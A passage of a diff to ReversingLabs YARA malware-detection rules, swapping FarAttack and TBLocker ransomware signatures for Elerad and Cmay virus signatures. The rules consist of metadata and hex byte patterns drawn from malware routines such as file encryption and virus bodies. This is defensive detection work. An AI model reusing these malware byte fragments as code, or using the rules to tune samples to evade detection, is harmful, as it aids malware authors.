?? 40 3D ?? ?? ?? ?? 72 ?? F6 C3 ?? - 75 ?? 8B 43 ?? 3B C3 73 ?? 2B D8 83 FB ?? 72 ?? 83 FB ?? 77 ?? 8B D8 53 E8 ?? ?? ?? - ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? - 8B C6 8B CE C6 00 ?? E8 ?? ?? ?? ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 5F 5E 5B 8B E5 5D C3 E8 ?? ?? ?? ?? CC CC CC CC CC B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? - ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C3 + $download_bin_2 = { + C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? + ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 + C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 + C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A + ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? + 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 + C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? + ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 72 ?? 57 E8 ?? ?? ?? ?? 83 C4 + ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 EB ?? 8B 8D ?? ?? ?? + ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ?? + ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 + 5D C3 } condition: - uint16(0)==0x5A4D and ($search_processes) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and $ping_apnic and $download_bin_1 and $download_bin_2 } -rule REVERSINGLABS_Win32_Ransomware_Farattack : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Win32_Virus_Elerad : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects FarAttack ransomware." + description = "Yara rule that detects Elerad virus." author = "ReversingLabs" - id = "7ee7121a-4ca2-513c-96dc-53b5c48d719f" - date = "2022-06-21" - modified = "2022-06-21" + id = "0307a136-ea2c-584c-bfda-f41e2c46fd09" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.FarAttack.yara#L1-L93" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "af22b8110c2b545f083b443c7a1fa7e7639324e9188eefadfe1fe70ebb1bb7fb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Win32.Virus.Elerad.yara#L3-L33" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "930594bf99daf55ef02542ce7b393c1c23ead75946b3da3b555102a2e7142e33" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "FarAttack" + tc_detection_type = "Virus" + tc_detection_name = "Elerad" tc_detection_factor = 5 importance = 25 strings: - $find_files = { - 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? - ?? ?? ?? 59 6A ?? 58 E9 ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 03 C7 89 - 45 ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? F7 06 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4E ?? - 51 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 06 ?? 74 ?? 8B 45 ?? 8D 04 45 ?? ?? ?? ?? 50 8D 46 ?? - 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 8B 53 ?? - 8B 75 ?? 8B 01 53 89 44 72 ?? 66 8B 41 ?? 8B CE 66 89 44 4A ?? FF 43 ?? 83 63 ?? ?? - E8 ?? ?? ?? ?? FF 4B ?? 83 63 ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 83 7B ?? ?? 75 ?? FF 73 - ?? FF 73 ?? FF 73 ?? FF 73 ?? 57 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C7 43 - ?? ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? - ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D - 04 45 ?? ?? ?? ?? 50 8D 46 ?? 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 83 7E ?? ?? 75 ?? 83 7E ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 8B 45 ?? 8D 34 00 - 8D 4E ?? 51 E8 ?? ?? ?? ?? 56 89 07 FF 73 ?? 50 E8 ?? ?? ?? ?? 8B 07 33 C9 83 C4 ?? - 66 89 0C 06 8B 75 ?? 51 57 51 8B 46 ?? 89 47 ?? 8B 46 ?? 89 47 ?? 8B 45 ?? 89 47 ?? - FF 73 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 4B ?? A1 ?? ?? ?? ?? 89 44 79 ?? 66 A1 ?? ?? - ?? ?? 66 89 44 79 ?? 56 FF 75 ?? FF 15 - } - $create_key = { - 55 8B EC 56 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 32 C0 EB ?? A1 ?? ?? ?? ?? 53 - 33 DB 85 C0 74 ?? 53 6A ?? 53 53 56 FF D0 EB ?? 8A C3 84 C0 75 ?? FF 15 ?? ?? ?? ?? - 3D ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 53 53 56 FF D0 8A D8 84 - DB 75 ?? 56 E8 ?? ?? ?? ?? 59 32 C0 EB ?? 8B 4D ?? B0 ?? 89 71 ?? 5B 5E 5D C3 - } - $encrypt_files_p1 = { - 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 - FF ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 8B 40 - ?? 83 C1 ?? 03 C1 8B 5D ?? 89 5D ?? 8B 4D ?? 89 4D ?? 99 03 D8 89 5D ?? 13 CA 89 4D - ?? 8B 55 ?? 8B 45 ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? - ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? ?? C7 45 ?? ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 59 89 4D ?? 51 - 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 4D ?? 6A ?? 53 51 6A ?? 6A ?? 57 FF 15 ?? - ?? ?? ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? - ?? ?? 89 45 ?? 89 45 ?? 33 C9 8B C1 89 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? 89 45 ?? 89 - 45 ?? 89 4D ?? 8B 4D ?? FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 - FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 85 C0 - } - $encrypt_files_p2 = { - 75 ?? 89 55 ?? 21 45 ?? 8B CE 89 4D ?? 89 4D ?? EB ?? 8B 4D ?? 3B 4D ?? 0F 8D ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 85 C9 74 ?? 83 7D ?? ?? 74 ?? 8D 41 ?? 3B 45 ?? 74 ?? - 8B C1 99 FF 75 ?? FF 75 ?? 52 50 E8 ?? ?? ?? ?? 8B C8 89 45 ?? C7 45 ?? ?? ?? ?? ?? - EB ?? 8B CA 81 E9 ?? ?? ?? ?? 89 4D ?? 8B 55 ?? 83 DA ?? 83 65 ?? ?? 89 55 ?? 6A ?? - 8B 45 ?? FF 70 ?? 52 51 E8 ?? ?? ?? ?? 6A ?? 8B 4D ?? FF 71 ?? 52 50 E8 ?? ?? ?? ?? - 8B C8 89 4D ?? 89 55 ?? 8B 45 ?? 2B C1 89 45 ?? 8B 4D ?? 1B CA 89 45 ?? 89 4D ?? EB - ?? 8B 55 ?? 8B C2 C1 F8 ?? FF 75 ?? FF 75 ?? 52 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? - 89 45 ?? 85 C0 75 ?? 50 FF 75 ?? FF 75 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? - ?? ?? 8B 75 ?? 8B 7D ?? 83 4D ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 - ?? E8 ?? ?? ?? ?? C3 03 45 ?? 56 6A ?? 8D 4D ?? 51 50 FF 75 ?? 50 6A ?? 6A ?? 8D 85 - ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 45 ?? 40 - 89 45 ?? 3B 45 ?? 75 ?? 8B 75 ?? FF 76 ?? FF 76 ?? 8B 45 ?? 03 45 ?? 03 45 ?? 50 E8 - ?? ?? ?? ?? FF 76 ?? FF 76 ?? 8B 46 ?? 03 45 ?? 03 45 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8B 7E ?? 03 7E ?? 03 7D ?? 03 7D ?? 8B 45 ?? 03 F8 8D 75 ?? A5 A5 A5 A5 6A - ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 F6 46 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 4D - ?? 8B 55 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 8B 35 ?? ?? ?? ?? FF D6 + $elerad_body = { + EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74 + 08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE + 00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB + 20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81 + ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? B9 09 02 00 00 8D 85 D0 10 40 + 00 31 10 83 C0 04 E2 F9 } condition: - uint16(0)==0x5A4D and ($find_files) and ($create_key) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ($elerad_body at pe.entry_point) } -rule REVERSINGLABS_Win32_Ransomware_Tblocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Win32_Virus_Cmay : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects TBLocker ransomware." + description = "Yara rule that detects Cmay virus." author = "ReversingLabs" - id = "91793018-baf6-5e70-83b6-8793482c3bec" + id = "d61e09f1-1d3f-5e1e-9884-25f1a465e88d" date = "2020-07-15" modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.TBLocker.yara#L1-L85" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "81f0077655ac0e59cd8dc05be602ae500c938668bd57d3cf4a51fbff2a5b6b83" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Win32.Virus.Cmay.yara#L3-L73" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f3bdf772eb80c632a913621732d12ae4a02bc7d3ba41f51711aa329be2ca6220" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TBLocker" + tc_detection_type = "Virus" + tc_detection_name = "Cmay" tc_detection_factor = 5 importance = 25 strings: - $main_ransomware_function_p1 = { - 00 02 16 28 ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 - 16 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 16 FE ?? 0A 06 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 16 15 28 ?? ?? ?? ?? 26 00 00 28 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE ?? 0B 07 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0C 08 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 25 - 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? - 00 02 18 28 ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? - 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 - } - $main_ransomware_function_p2 = { - 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? - ?? 5B 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 - ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? - ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? - ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? - ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F ?? DA 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? - ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? - ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F - } - $search_files = { - 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 06 6F ?? ?? ?? - ?? 0B 07 07 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE - ?? 0C 08 2C ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0D 09 2C ?? 00 02 07 07 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 07 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? - ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? DE ?? 00 00 00 00 00 00 06 6F - ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? - 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? - 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? - ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? - ?? ?? ?? 16 FE ?? 13 ?? 11 ?? 2C ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 13 ?? - 11 ?? 2C ?? 00 02 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? - 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? - ?? ?? ?? DE ?? 00 00 00 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 - ?? 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 17 D6 13 ?? - 11 ?? 11 ?? 8E 69 FE ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? 2A + $cmay_body_1 = { + 60 66 9C E8 00 00 00 00 5D 8B C5 81 ED ?? ?? ?? ?? 2D 08 00 00 00 2D + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 3A 02 00 00 0F 82 7C 03 00 00 8D B5 + ?? ?? ?? ?? 8D BD ?? ?? ?? ?? E8 4F 02 00 00 E8 05 00 00 00 E9 61 03 + 00 00 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 03 6A 7F 57 FF 95 ?? ?? ?? + ?? 83 C7 7F 6A 7F 57 FF 95 ?? ?? ?? ?? 83 C7 7F 57 6A 7F FF 95 ?? ?? + ?? ?? 8D BD ?? ?? ?? ?? 80 BD ?? ?? ?? ?? 00 0F 84 20 03 00 00 FE 8D + ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? 83 C7 7F 8D 9D ?? ?? ?? ?? 53 8D 9D + ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 83 F8 FF 74 CA 89 85 ?? ?? ?? ?? FF + 85 ?? ?? ?? ?? E8 C0 02 00 00 83 F8 FF 74 75 E8 70 02 00 00 85 C0 74 + 6C 8B 85 ?? ?? ?? ?? 8B 50 3C 3B 95 ?? ?? ?? ?? 73 5B 03 D0 8B 02 35 + 96 23 00 00 3D C6 66 00 00 75 4B 81 7A 4C 53 54 30 00 74 42 52 FF B5 + ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 5A FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? + E8 79 00 00 00 8F 85 ?? ?? ?? ?? 8F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? + 05 7E 0E 80 BD ?? ?? ?? ?? 00 0F 85 40 FF FF FF C3 57 8D BD ?? ?? ?? + ?? B9 04 01 00 00 32 C0 F3 AA 5F FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? + FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? + ?? 8D 9D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 74 + 05 E9 2A FF FF FF E9 E9 FE FF FF 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? + 8B 5A 3C E8 87 01 00 00 89 B5 ?? ?? ?? ?? E8 8B 01 00 00 33 DB 8B 95 + ?? ?? ?? ?? 8B 42 3C 03 D0 0F B7 42 06 48 6B C0 28 0F B7 5A 14 83 C3 + 18 03 DA 03 C3 8B 58 10 03 58 14 03 9D ?? ?? ?? ?? 53 8B 4A 28 89 8D + ?? ?? ?? ?? 8B 4A 34 89 8D ?? ?? ?? ?? 8B 48 0C 03 48 10 89 8D ?? ?? + ?? ?? 89 4A 28 8B 70 10 81 C6 ?? ?? ?? ?? 8B 5A 3C E8 1D 01 00 00 89 + 70 10 89 70 08 03 70 0C 89 72 50 81 48 24 20 00 00 A0 C7 42 4C 53 54 } - $encrypt_files = { - 00 00 03 19 17 73 ?? ?? ?? ?? 0A 04 18 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 05 6F - ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 28 ?? ?? ?? ?? 05 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? - 0D 07 09 17 73 ?? ?? ?? ?? 13 ?? 06 6F ?? ?? ?? ?? 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 13 ?? 06 11 ?? 16 - 11 ?? 8E 69 6F ?? ?? ?? ?? 26 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 - 6F ?? ?? ?? ?? 00 06 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 2A + $cmay_body_2 = { + 30 00 5B B9 ?? ?? ?? ?? FC 8B FB 8D B5 ?? ?? ?? ?? F3 A4 FF B5 ?? ?? + ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? FF 95 ?? ?? ?? ?? C3 50 51 B9 05 00 00 00 8B 44 24 2E 25 00 + 00 FF FF 66 81 38 4D 5A 74 09 2D 00 00 01 00 E2 F2 EB 06 89 85 ?? ?? + ?? ?? 59 58 74 01 F9 C3 56 8B 95 ?? ?? ?? ?? 8B 72 3C 03 F2 8B 76 78 + 03 F2 83 C6 1C AD 03 C2 89 85 ?? ?? ?? ?? AD 03 C2 89 85 ?? ?? ?? ?? + AD 03 C2 89 85 ?? ?? ?? ?? 5E 57 E8 16 00 00 00 5F 89 07 83 C7 04 80 + 3E 88 C7 85 ?? ?? ?? ?? 00 00 00 00 75 E5 C3 8B DE 80 3E 